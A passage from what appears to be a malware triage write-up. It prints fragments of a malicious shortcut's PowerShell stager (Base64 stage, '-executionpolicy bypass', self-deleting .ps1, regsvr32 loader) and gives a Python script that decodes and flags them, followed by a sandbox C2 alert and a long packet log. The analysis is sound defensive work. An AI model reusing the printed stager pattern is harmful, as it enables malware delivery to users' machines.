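    "L0dNT1dEVFJmSUoueHRxO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvR01PV0RUUmZJSi54dHE7"
    "YnJlYWt9IGNhdGNoIHsgfX0="
    r"')) > " r'"%tmp%\ezMgZunnfF.ps1" ; powershell -executionpolicy bypass -file '
    r'"%tmp%\ezMgZunnfF.ps1"; Remove-Item "%tmp%\ezMgZunnfF.ps1"'
)

B64_RE = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")
URL_RE = re.compile(r"https?://[^\s\"'(),;]+")
OUTFILE_RE = re.compile(r"-OutFile\s+([^\s;]+)")
REGSVR_RE = re.compile(r"regsvr32(?:\.exe)?\s+([^\s;]+)", re.IGNORECASE)
STAGER_RE = re.compile(r'-file\s+"([^"]+)"', re.IGNORECASE)


@dataclass
class Triage:
    stager_path: str            # .ps1 the LNK writes into %tmp% and executes
    stage2: str                 # decoded PowerShell second stage
    urls: list[str]             # download locations, tried in order
    drop_path: str | None       # where the downloaded payload is saved
    loader: str | None          # LOLBin that executes the payload
    indicators: list[str] = field(default_factory=list)


def extract_b64(args: str) -> str:
    """Return the Base64 literal passed to FromBase64String, or raise."""
    m = B64_RE.search(args)
    if m is None:
        raise ValueError("no FromBase64String('...') literal in argument string")
    return m.group(1)


def decode_stage(b64: str) -> str:
    """Decode as the LNK does ([Text.Encoding]::ASCII). Strict on purpose: a blob
    that is not valid Base64 or not pure ASCII fails loudly instead of being
    silently mangled into something that looks like a script."""
    return base64.b64decode(b64, validate=True).decode("ascii")


def triage(args: str) -> Triage:
    stage2 = decode_stage(extract_b64(args))
    out = OUTFILE_RE.search(stage2)
    reg = REGSVR_RE.search(stage2)
    stager = STAGER_RE.search(args)
    t = Triage(
        stager_path=stager.group(1) if stager else "",
        stage2=stage2,
        urls=URL_RE.findall(stage2),
        drop_path=out.group(1) if out else None,
        loader="regsvr32.exe" if reg else None,
    )
    if re.search(r"-executionpolicy\s+bypass", args, re.IGNORECASE):
        t.indicators.append("powershell started with -executionpolicy bypass")
    if re.search(r"Remove-Item\s+\"?%tmp%", args, re.IGNORECASE):
        t.indicators.append("stager deletes its own .ps1 after running it")
    if "SilentlyContinue" in stage2:
        t.indicators.append("$ProgressPreference silenced: downloads run without UI")
    if len(t.urls) > 1 and "break" in stage2:
        t.indicators.append(f"{len(t.urls)} fallback URLs, first successful download wins")
    # regsvr32 does not care about the extension: it LoadLibrary()s the file and
    # calls DllRegisterServer, so a non-.dll name in TEMP is a loader tell.
    if reg and t.drop_path and reg.group(1) == t.drop_path \
            and not t.drop_path.lower().endswith(".dll"):
        t.indicators.append(f"regsvr32 given a non-.dll file: {t.drop_path}")
    return t


if __name__ == "__main__":
    report = triage(LNK_ARGS)
    print("stager :", report.stager_path)
    print("loader :", report.loader, report.drop_path)
    for u in report.urls:
        print("url    :", u)
    for i in report.indicators:
        print("flag   :", i)
```

The script deliberately decodes with a strict ASCII codec: the shortcut's own call to [System.Text.Encoding]::ASCII would silently turn any non-ASCII byte into "?", and a triage tool that reproduces that behaviour can be fooled into reporting a script the victim never ran. Paste a different LNK argument string into LNK_ARGS to reuse it; a shortcut that does not use the FromBase64String pattern raises instead of returning an empty report.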

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/26/22-09:46:56.833835 | TCP | 2404310 | ET CNC Feodo Tracker Reported CnC Server TCP group 6 | 49756 | 8080 | 192.168.2.3 | 138.201.142.73

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 26, 2022 09:46:22.751005888 CEST | 49747 | 80 | 192.168.2.3 | 166.62.28.147
Apr 26, 2022 09:46:23.005525112 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.005657911 CEST | 49747 | 80 | 192.168.2.3 | 166.62.28.147
Apr 26, 2022 09:46:23.079543114 CEST | 49747 | 80 | 192.168.2.3 | 166.62.28.147
Apr 26, 2022 09:46:23.333266973 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.356245995 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.356312990 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.356355906 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.356398106 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.356435061 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.356453896 CEST | 49747 | 80 | 192.168.2.3 | 166.62.28.147
Apr 26, 2022 09:46:23.356478930 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.356539011 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.356578112 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.356580973 CEST | 49747 | 80 | 192.168.2.3 | 166.62.28.147
Apr 26, 2022 09:46:23.356618881 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.356658936 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.356662989 CEST | 49747 | 80 | 192.168.2.3 | 166.62.28.147
Apr 26, 2022 09:46:23.356709957 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.356762886 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.356806993 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.356863976 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.356910944 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.356959105 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.356959105 CEST | 49747 | 80 | 192.168.2.3 | 166.62.28.147
Apr 26, 2022 09:46:23.356977940 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.356995106 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.357013941 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.357031107 CEST | 49747 | 80 | 192.168.2.3 | 166.62.28.147
Apr 26, 2022 09:46:23.357033014 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.357055902 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.357096910 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.357098103 CEST | 49747 | 80 | 192.168.2.3 | 166.62.28.147
Apr 26, 2022 09:46:23.357117891 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.357136965 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.357153893 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.357167959 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.357192993 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.357201099 CEST | 49747 | 80 | 192.168.2.3 | 166.62.28.147
Apr 26, 2022 09:46:23.357220888 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.357248068 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.357258081 CEST | 49747 | 80 | 192.168.2.3 | 166.62.28.147
Apr 26, 2022 09:46:23.357276917 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.357296944 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.357315063 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.357332945 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.357351065 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.357368946 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.357368946 CEST | 49747 | 80 | 192.168.2.3 | 166.62.28.147
Apr 26, 2022 09:46:23.357383966 CEST | 49747 | 80 | 192.168.2.3 | 166.62.28.147
Apr 26, 2022 09:46:23.357423067 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.357486963 CEST | 49747 | 80 | 192.168.2.3 | 166.62.28.147
Apr 26, 2022 09:46:23.357508898 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.357547045 CEST | 49747 | 80 | 192.168.2.3 | 166.62.28.147
Apr 26, 2022 09:46:23.357566118 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.357580900 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.357604980 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.357625008 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.357700109 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.357755899 CEST | 49747 | 80 | 192.168.2.3 | 166.62.28.147
Apr 26, 2022 09:46:23.357770920 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.357832909 CEST | 49747 | 80 | 192.168.2.3 | 166.62.28.147
Apr 26, 2022 09:46:23.432987928 CEST | 49747 | 80 | 192.168.2.3 | 166.62.28.147
Apr 26, 2022 09:46:23.612996101 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.613023996 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.613044024 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.613060951 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.613080025 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.613096952 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.613111973 CEST | 49747 | 80 | 192.168.2.3 | 166.62.28.147
Apr 26, 2022 09:46:23.613112926 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.613162994 CEST | 49747 | 80 | 192.168.2.3 | 166.62.28.147
Apr 26, 2022 09:46:23.613200903 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.613219023 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.613234997 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.613251925 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.613255024 CEST | 49747 | 80 | 192.168.2.3 | 166.62.28.147
Apr 26, 2022 09:46:23.613270998 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.613289118 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.613303900 CEST | 49747 | 80 | 192.168.2.3 | 166.62.28.147
Apr 26, 2022 09:46:23.613337994 CEST | 49747 | 80 | 192.168.2.3 | 166.62.28.147
Apr 26, 2022 09:46:23.613518000 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.613537073 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.613553047 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.613562107 CEST | 49747 | 80 | 192.168.2.3 | 166.62.28.147
Apr 26, 2022 09:46:23.613594055 CEST | 49747 | 80 | 192.168.2.3 | 166.62.28.147
Apr 26, 2022 09:46:23.613634109 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
Apr 26, 2022 09:46:23.613651991 CEST | 80 | 49747 | 166.62.28.147 | 192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613668919 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613708019 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613713026 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613751888 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613784075 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613801956 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613821030 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613837004 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613850117 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613854885 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613883972 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613914967 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613960981 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.613966942 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614001989 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614042997 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614099979 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614118099 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614176989 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614197016 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614214897 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614233017 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614254951 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614272118 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614312887 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614322901 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614409924 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614448071 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614459038 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614547014 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614564896 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614593983 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614614010 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614630938 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614658117 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614686966 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614713907 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614731073 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614731073 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614749908 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614768028 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614784956 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614785910 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.614820004 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.745527983 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.869965076 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.870023966 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.870062113 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.870085001 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.870101929 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.870141029 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.870179892 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.923218012 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.923304081 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.923315048 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.923618078 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.923677921 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.923903942 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.964986086 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.965055943 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.965060949 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.965363026 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:23.965414047 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:23.965645075 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.008852005 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.008958101 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.009028912 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.009057999 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.009140015 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.009169102 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.009248018 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.009287119 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.009298086 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.009330988 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.009372950 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.009377003 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.009413004 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.009455919 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.009458065 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.009495974 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.009533882 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.009538889 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.047760963 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.047843933 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.047897100 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.048255920 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.048317909 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.048362017 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.094289064 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.094369888 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.094491005 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.094579935 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.094608068 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.094624043 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.094635010 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.094660997 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.094671011 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.094687939 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.094715118 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.094743013 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.094764948 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.094810009 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.094851971 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.141383886 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.141455889 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.141599894 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.141709089 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.141777039 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.141946077 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.193900108 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.193965912 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.194006920 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.194046974 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.805603027 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.805663109 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.805757999 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.805814028 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.805891991 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.806144953 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.806262970 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.806370020 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.860276937 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.860358000 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.860439062 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.860476017 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.860517025 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.860702991 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.860728025 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.860863924 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.908833981 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.908898115 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.908977985 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.909014940 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.909135103 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.909246922 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.909341097 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.909466028 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.969463110 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.969541073 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.969579935 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.969613075 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.969738007 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.969819069 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:24.970026970 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:24.970104933 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.028892040 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.028984070 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.029027939 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.029040098 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.029078960 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.029124022 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.029196978 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.029261112 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.096277952 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.096339941 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.096456051 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.096534014 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.096577883 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.096586943 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.096771955 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.096837044 CEST4974780192.168.2.3166.62.28.147
                                                                                                                                                                                  Apr 26, 2022 09:46:25.173002958 CEST8049747166.62.28.147192.168.2.3
                                                                                                                                                                                  Apr 26, 2022 09:46:25.173072100 CEST8049747166.62.28.147192.168.2.3
